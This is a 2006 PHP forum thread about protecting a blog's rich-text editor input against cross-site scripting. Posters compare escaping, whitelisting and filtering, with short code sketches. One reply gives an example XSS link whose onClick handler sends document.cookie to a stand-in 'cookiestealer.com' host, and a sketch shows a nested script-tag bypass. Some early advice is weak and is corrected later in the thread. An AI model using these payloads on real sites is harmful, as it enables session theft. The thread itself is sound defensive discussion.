Rich text editing
Posted: Thu Mar 16, 2006 12:00 pm
by Roja
If I have an extremely simple editing system (think blog, with little structure), and I add a rich text editor (such as FCKeditor), what general steps do I need to ensure security?
I'm presuming something like:
- Rich text editor for input
- Filter input (To remove what? How?)
- Add escaping for storage to DB
- Store to DB
- Pull from DB
- Escape output (To remove what? How?)
- Present output to user
The two items marked "(To remove what? How?)" are the ones I am unclear on the specifics for, and would appreciate guidance. If we are allowing users to enter *rich text*, which includes HTML, I'm very unclear on the full range of items we need to filter to ensure no XSS, JS attacks, and so forth.
I'm also unclear on the specifics of what you would escape in the output. By definition, we want html to come through, so what would we be htmlentities escaping?
Any specific guidance on these general concepts is appreciated. While I'm strong on security in other areas, these two items in this specific scenario are something I've always avoided as being too risky, but I can no longer do so.
Any pre-packaged solutions for any of the above steps are also welcome. By way of example, I'll be using ADOdb for the escaping for storage, and CRUD events. The solutions would need to be GPL-compatible.
Please be gentle. I know that I am normally one of the first people answering these types of questions, but this is an area where I am less confident, and I would appreciate the knowledge and understanding of the community to help me improve.
Posted: Thu Mar 16, 2006 12:09 pm
by Burrito
I can't give you an all-encompassing security resolution but I can start you off with this:
By default, an RTE's output will already be "htmlentitied".
In other words, if I type <script> in my RTE, it's going to interpret the "<" as "&lt;", etc.
The way I've done it in the past is to use the innerHTML of the element (usually an iframe) and copy that into a hidden form var, then on post take the value of that form var and dump it into my db.
You'll still want to run it through mysql_real_escape_string(), but other than that, I haven't run into any issues.
Posted: Thu Mar 16, 2006 3:32 pm
by pickle
The dangers in the input & output are possible execution of code, and broken xhtml code.
FCKeditor (and most other RTEs) allow you to edit the source code directly. It's easy, then, to post broken code which breaks the web page displaying it. Perhaps writing a parser or somehow using a command-line version of htmlTidy could at least tell you if the xhtml code is malformed.
As for stopping PHP code from being executed - that's easy. Just don't ever handle that string in such a way as to be executed.
Javascript may be a little more difficult. Inline javascript will, of course, have to be put inside <script></script> tags - so you could just parse the input and strip out those tags and anything they contain.
Posted: Thu Mar 16, 2006 9:16 pm
by Ambush Commander
Mmm... as the market stands now, no pure-PHP solution is satisfactory, mainly because none of them really "know" about the HTML specification. I've been working on something that does, and let me tell you, it's not easy.
The "best" way to do it would be to...
1. Lex the HTML fragment according to the SGML standard into tokens (MarkupLexer, finished that)
2. Take tokens and pass them through a DTD, which knows about the specification and can check for many things:
* Proper nesting (not just "do all elements close" but "did they try to put a block level element in an inline one"?)
* Proper attribute formats (at least a dozen RFCs for each including URLs and CSS)
3. Recompile the tokens into HTML
4. Run a gauntlet of compatibility checks, attempting to eliminate any possible browser quirks that cause non-standard behavior and could compromise insecure browsers (esp. IE, this happens a lot)
5. If changes were made, re-rinse, until the HTML stops changing
Of course, no one in their right mind would do it (except me). But any other solution is unsatisfactory. This is the main reason why forums use BBcode, and why most systems that actually have HTML parsing don't do it completely correctly, and are hideously complex.
(I believe I've harped about this in a previous thread already, but I can't remember what it was)
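To show why step 5 (re-rinse until the HTML stops changing) matters, here is a minimal sketch. It is not the MarkupLexer code; filter_until_stable() and the deliberately naive $stripScriptTags pass are hypothetical names made up for this illustration. A single pass over a nested payload reassembles a working script tag, and only repeating the pass until nothing changes gets rid of it.

```php
<?php
// Hypothetical helper: re-run a filtering pass until its output stops changing.
function filter_until_stable(string $html, callable $pass, int $maxRounds = 10): string
{
    for ($i = 0; $i < $maxRounds; $i++) {
        $filtered = $pass($html);
        if ($filtered === $html) {
            return $html; // fixed point reached, another pass would change nothing
        }
        $html = $filtered;
    }
    // The markup never settled, so refuse to emit it as HTML at all.
    return htmlspecialchars($html, ENT_QUOTES, 'UTF-8');
}

// Deliberately naive pass, for illustration only: delete literal script tags.
$stripScriptTags = function (string $html): string {
    return str_ireplace(['<script>', '</script>'], '', $html);
};

$input  = '<scr<script>ipt>alert(1)</scr</script>ipt>';
$once   = $stripScriptTags($input);                       // one pass only
$stable = filter_until_stable($input, $stripScriptTags);  // repeated until stable
```

After one pass $once is a complete <script>alert(1)</script> again, while $stable has been reduced to plain text. The loop only makes a given pass consistent with itself; it does not make a weak pass strong.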
Posted: Thu Mar 16, 2006 9:35 pm
by josh
Burrito wrote: if I type in <script> in my RTE, it's going to interpret the "<" as "&lt;" etc.
and if I telnet in and type <script> in my POST data it's not going to escape anything
pickle wrote: Inline javascript will, of course, have to be put inside <script></script> tags
What about
Code: Select all
<p onMouseOver="armagedon(); return false;"></p>
Or things along those lines?
I would personally say use a "fuzzy" whitelist, using preg.
If the rich text allows bold, italics, underline and colors, for example, you can match against each one in turn:
Code: Select all
// $input is the submitted HTML; $matches receives the captured color and text
preg_match('@<span style="color:#?([a-zA-Z0-9]+)?;" >([a-zA-Z0-9]+)</span>@', $input, $matches);
This is just an example, I suck at regex
Posted: Thu Mar 16, 2006 10:01 pm
by Ambush Commander
I don't understand: how does matching a regular expression help escape it?
Posted: Thu Mar 16, 2006 10:15 pm
by josh
you let the parts of the submitted string that match the expression slide by, and you htmlentities() the rest of the string. I guess you would swap out those pieces of text for placeholders, then swap them back in after the escaping?
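A rough sketch of that placeholder idea, under some assumptions: escape_except_whitelisted() and the $allowed pattern list are hypothetical names invented for this example, the patterns match individual tags rather than whole elements, and htmlspecialchars() stands in for htmlentities(). Treat it as an illustration of the swap-out/escape/swap-in flow, not a vetted filter.

```php
<?php
// Hypothetical helper: keep fragments matching a whitelist, escape everything else.
function escape_except_whitelisted(string $input, array $patterns): string
{
    $kept = [];
    // Random token per call, so a user cannot guess and forge a placeholder.
    $token = bin2hex(random_bytes(8));

    // 1. Swap every whitelisted fragment out for a placeholder.
    foreach ($patterns as $pattern) {
        $input = preg_replace_callback($pattern, function (array $m) use (&$kept, $token) {
            $kept[] = $m[0];
            return '[[' . $token . ':' . (count($kept) - 1) . ']]';
        }, $input);
    }

    // 2. Escape whatever is left, which neutralises any markup not on the list.
    $escaped = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

    // 3. Swap the approved fragments back in.
    return preg_replace_callback('/\[\[' . $token . ':(\d+)\]\]/', function (array $m) use ($kept) {
        return $kept[(int) $m[1]];
    }, $escaped);
}

// Assumed whitelist: bold/italic/underline tags and a six-digit hex color span.
$allowed = [
    '@</?(?:b|i|u)>@i',
    '@<span style="color:#[0-9a-fA-F]{6};">@',
    '@</span>@',
];

$out = escape_except_whitelisted(
    '<b>hi</b> <p onMouseOver="armagedon(); return false;">x</p> <span style="color:#ff0000;">red</span>',
    $allowed
);
```

In this sketch the <p> tag with the event handler comes out as inert text, while the bold and color tags survive. Nothing here checks that the surviving tags are closed or properly nested.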
Posted: Fri Mar 17, 2006 9:48 am
by pickle
jshpro2 wrote:
What about
Code: Select all
<p onMouseOver="armagedon(); return false;"></p>
Or things along those lines?
armagedon() will still have to be declared within <script></script> tags. The worst that'll do (unless Roja defines a function armagedon()) is generate a script error....I think.
Posted: Fri Mar 17, 2006 9:56 am
by josh
That's an example. Instead of calling that function you can put JavaScript right in there. Here's a different example though:
Code: Select all
<a href="#" onClick="window.location.href='http://cookiestealer.com/script.php?ssid='+document.cookie">free beer click here</a>
no <script> tags needed
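To make the point concrete, here is a small sketch of a filter that only strips script elements, run against that same link. strip_script_elements() is a hypothetical name for this example, and the regex is only a rough approximation of "remove the tags and anything they contain".

```php
<?php
// Naive filter, for illustration only: drop <script> elements and their contents.
function strip_script_elements(string $html): string
{
    return preg_replace('@<script\b[^>]*>.*?</script\s*>@is', '', $html);
}

$post = '<script>alert(1)</script>'
      . '<a href="#" onClick="window.location.href=\'http://cookiestealer.com/script.php?ssid=\'+document.cookie">free beer click here</a>';

$filtered = strip_script_elements($post);

// The script element is gone, but the inline event handler is untouched.
$scriptGone      = stripos($filtered, '<script') === false;
$handlerSurvives = stripos($filtered, 'onclick=') !== false;
```

Both $scriptGone and $handlerSurvives end up true, so a tag-only blacklist still lets the cookie-stealing link through.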
Posted: Fri Mar 17, 2006 3:09 pm
by Burrito
jshpro2 wrote:
and if I telnet in and type <script> in my POST data it's not going to escape anything
so use a challenge / response on your form to prevent that
Posted: Sat Mar 18, 2006 3:47 pm
by Ambush Commander
Aw, come on, it's not that hard to spoof a challenge/response (the challenge is for protection from third-party attackers). Anything client-side cannot be trusted. The rich text editor takes WYSIWYG input, translates it into HTML, and then sends it to the server as regular POST data.
Posted: Sun Mar 19, 2006 10:06 am
by shiflett
How much HTML do you want to allow? For simple things, I find it easiest to escape everything and then convert allowed entities back to their original form. This also lets you make sure the user has closed bold tags and things of that nature.
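A minimal sketch of the escape-everything-then-restore approach for simple cases. The function name escape_then_restore() and the default tag list are assumptions chosen for illustration, and the "closed tags" check is just a count comparison, so it would not notice tags that appear in the wrong order.

```php
<?php
// Hypothetical helper: escape all input, then restore a few attribute-free tags.
function escape_then_restore(string $input, array $tags = ['b', 'i', 'u']): string
{
    // Escape everything first, so nothing is live markup at this point.
    $html = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

    foreach ($tags as $tag) {
        $opens  = substr_count($html, "&lt;$tag&gt;");
        $closes = substr_count($html, "&lt;/$tag&gt;");
        // Only restore a tag when every opening has a matching close.
        if ($opens > 0 && $opens === $closes) {
            $html = str_replace(
                ["&lt;$tag&gt;", "&lt;/$tag&gt;"],
                ["<$tag>", "</$tag>"],
                $html
            );
        }
    }
    return $html;
}

$out = escape_then_restore('<b>bold</b> <i>unclosed <script>alert(1)</script>');
```

Here the balanced <b> pair is restored, while the unclosed <i> and the script tags stay escaped. Because only exact, attribute-free tags are converted back, anything like an onClick attribute never becomes live markup.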
For more complex needs, you might find this helpful:
http://cyberai.com/inputfilter/
It lets you take a whitelist or blacklist approach with both tags and attributes, and it also has an option to automatically remove common problems.
Posted: Sun Mar 19, 2006 1:53 pm
by Ambush Commander
Note that inputfilter isn't perfect, and if you make it too permissive, it will let malicious output through (only because it doesn't actually know about the specification), although at the very least it will cause your document to stop validating (e.g. it doesn't check proper nesting of blocks and inlines).